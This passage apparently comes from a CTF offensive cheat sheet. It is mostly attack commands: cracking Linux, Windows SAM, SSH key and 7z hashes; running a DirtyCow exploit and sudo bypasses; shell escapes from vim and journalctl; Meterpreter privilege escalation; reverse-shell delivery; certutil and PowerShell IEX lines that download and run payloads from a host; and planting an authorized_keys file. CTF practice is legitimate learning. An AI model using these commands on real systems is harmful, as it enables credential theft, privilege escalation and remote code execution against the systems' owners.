john --show <HASHES_FILE>

• Pause/resume cracking:

john --restore

• Crack SSH private key passwords:

ssh2john id_rsa > ssh.hash
john ssh.hash --wordlist=rockyou.txt

SAM (Security Account Manager) stores hashed passwords for Windows accounts. In CTFs, it’s often extracted from mounted .vhd or .img disk files.

1️⃣ Copy the SAM and SYSTEM files:

cp /mnt/vhd/Windows/System32/config/SAM .
cp /mnt/vhd/Windows/System32/config/SYSTEM .

2️⃣ Organize files:

mkdir Backup_dump
mv SAM SYSTEM Backup_dump/
cd Backup_dump/

3️⃣ Dump hashes using impacket-secretsdump:

impacket-secretsdump -sam SAM -system SYSTEM local

✅ You’ll get outputs like:

Administrator:500:LMHASH:NTHASH:::
User:1000:LMHASH:NTHASH:::

• Crack NT hashes with john:

john hashes.txt --format=NT --wordlist=rockyou.txt

• If disk image is encrypted (e.g., BitLocker), unlock first using passphrase or key.

• Use mmls + fls + icat (SleuthKit) for forensic-style SAM/SYSTEM extraction from raw disk images.

• Look for clues in registry hives and user profiles once hash is cracked.

In Linux systems, user credentials are stored across two files:

• /etc/passwd – stores usernames and UID info
• /etc/shadow – stores password hashes (restricted access)

unshadow passwd shadow > merged_hashes.txt

• Merges the two files into a format compatible with John the Ripper

john merged_hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

• You can extract these from VMs, Docker containers, or mounted file systems.
• Look for password hashes starting with:
  • $6$ – SHA-512
  • $1$ – MD5
  • $y$ – yescrypt (more secure)
• Use john --show to reveal cracked results:

john --show merged_hashes.txt

• If you only have one hash:

echo 'user:$6$hash....' > onehash.txt
john onehash.txt --wordlist=rockyou.txt

Hashcat is a powerful tool to crack hashes using GPU acceleration—ideal for large datasets or tougher hashes.

hashcat -m 500 -a 0 -o cracked.txt hashes.txt /usr/share/wordlists/rockyou.txt --force

• -m 500: Hash type (500 = MD5 crypt, i.e., $1$)
• -a 0: Attack mode (0 = dictionary attack)
• -o: Output file for cracked results
• --force: Ignore warnings (used in VMs or non-GPU systems)

🔍 Use hashid or hashid <hash> to detect the hash type.

• Use --show to display cracked results:

hashcat -m 500 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt --show

• Crack hashes from unshadow, zip2john, or ssh2john by identifying their format and using the right mode.

• Enable optimized GPU use (if supported):

hashcat -O -w 3 ...

• Benchmark all algorithms:

hashcat -b

To extract and crack a password-protected .7z archive, use 7z2john.py from the John the Ripper suite.

7z2john.pl protected.7z > 7z.hash

john 7z.hash --wordlist=/usr/share/wordlists/rockyou.txt

If given an encrypted SSH private key (id_rsa), you can recover its password using ssh2john.py.

ssh2john.py id_rsa > ssh.hash

john ssh.hash --wordlist=/usr/share/wordlists/rockyou.txt

• If john fails, try hashcat with proper hash mode (e.g., -m 14600 for 7z).
• SSH private key cracks often lead to user shells or privilege escalation.
• Always check metadata or filenames (like backup.7z, id_rsa.bak)—they often contain valuable credentials.

Use these tools to automate privilege escalation, system enumeration, and data decoding—critical for post-exploitation in CTFs.

• 🔍 LinEnum

  • Automates full Linux system enumeration—users, crons, SUIDs, kernels.

• 🧠 LinuxPrivChecker

  • Python-based privilege escalation checker (great for local root).

• 🧾 Unix-PrivEsc-Check

  • Shell script that checks common privilege escalation vectors.

• 📋 PEASS-ng (Linux)

  • linpeas.sh – Most comprehensive local enumeration script.

• 🔎 JAWS

  • PowerShell script to scan Windows for escalation paths.

• 📋 PEASS-ng (Windows)

  • winPEAS.exe – Deep enumeration of Windows services, tasks, misconfigs.

• ⏱️ pspy
  • Observe cronjobs, timed scripts, or root-executed processes without root.

• 🔓 GTFOBins

  • Helps exploit sudo, setuid, and capability binaries for privilege escalation.

• 📑 LOLBAS

  • Windows equivalent to GTFOBins—enumerate and abuse trusted binaries.

• 🧪 CyberChef
  • "The Cyber Swiss Army Knife" for base64, hex, XOR, encodings, regex, and more.
  • Web Version: CyberChef Online

• Always upload and run LinEnum or linpeas immediately after initial shell.
• Combine pspy + GTFOBins for powerful cron-based privilege escalation.
• Use CyberChef to reverse obfuscation or decode multi-layered strings fast.

Exploit older Linux kernels with DirtyCow:
👉 PoC Code: dirty.c

gcc -pthread dirty.c -o dirtycow
./dirtycow
su firefart  # Password: dirtycow

Check sudo privileges:

sudo -l

Common exploit patterns:

sudo -u <target_user> /bin/bash
sudo cat /root/root.txt
sudo -u#-1 /bin/bash  # Bypass !root restrictions

In Meterpreter:

getsystem
background
use post/multi/recon/local_exploit_suggestor
set session 1
run

🔍 Other Tools:

• Sherlock (Privilege Suggestor)
• FuzzySec PrivEsc Guide

🧬 Migrate Process:

migrate <PID>

Shell Delivery:

/opt/unicorn/unicorn.py windows/meterpreter/reverse_tcp <HOST_IP> 3333
msfconsole -r unicorn.rc

MySQL Shell:

mysql> \! /bin/sh

VIM Shell:

sudo /usr/bin/vi /file/path
# Press ESC, then type:
:!/bin/bash

Monitor system jobs:

tail -f /var/log/syslog

Override input:

echo 'url = "file:///root/root.txt"' > input

If executed via a privileged script:

!/bin/bash

Example within VIM/Journalctl:

sudo /usr/bin/journalctl -n5 -unostromo.service
# Then type !/bin/bash

python3 -c "import pty; pty.spawn('/bin/bash')"
# Press CTRL+Z
stty raw -echo; fg
export TERM=xterm

Linux:

python3 -m http.server
wget http://<HOST_IP>:8000/file.sh

Windows:

certutil -urlcache -f http://<HOST_IP>/payload.exe payload.exe
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://<HOST_IP>:8000/script.ps1')"

If login successful:

put id_rsa.pub
rename id_rsa.pub .ssh/authorized_keys

Multi-threaded recon and service enumeration: 👉 Reconnoitre Tool

reconnoitre -t <TARGET_IP> -o `pwd` --services